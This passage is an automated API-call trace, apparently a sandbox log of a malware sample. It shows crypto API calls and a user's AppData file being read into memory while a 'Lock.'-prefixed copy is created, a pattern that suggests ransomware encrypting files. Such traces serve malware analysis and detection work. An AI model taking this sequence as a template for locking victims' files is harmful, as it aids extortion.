hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0228.471] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0228.471] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.471] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.471] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.471] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.471] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0228.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.472] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0228.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0228.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0228.472] CryptDestroyHash (hHash=0xa87490) returned 1 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.473] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0228.473] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.473] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0228.473] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0228.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0228.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0228.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0228.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0228.474] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/E2eFopJKn6uustHoKg.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\e2efopjkn6uusthokg.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0228.475] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.475] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0228.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0228.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0228.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0228.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0228.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0228.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.494] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0228.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0228.494] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0228.494] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0228.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0228.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0228.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0228.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0228.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0228.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.495] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0228.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0228.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0228.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0228.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.E2eFopJKn6uustHoKg.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.e2efopjkn6uusthokg.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0228.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0228.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0228.498] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0228.498] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0228.498] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0228.498] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0228.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0228.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5a020 [0228.566] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0228.566] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x7128, lpOverlapped=0x0) returned 1 [0228.569] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0228.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7128) returned 0x3bf0dd8 [0228.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5a020 | out: hHeap=0x970000) returned 1 [0228.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0228.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0228.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0228.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0228.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0228.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7128) returned 0x2f14818 [0228.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.574] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7128) returned 0x3bf0dd8 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0228.574] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0228.574] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0228.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0228.574] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0228.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0228.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7128) returned 0x3bf0dd8 [0228.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0228.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f58 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550e8 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7128) returned 0x2f1b948 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 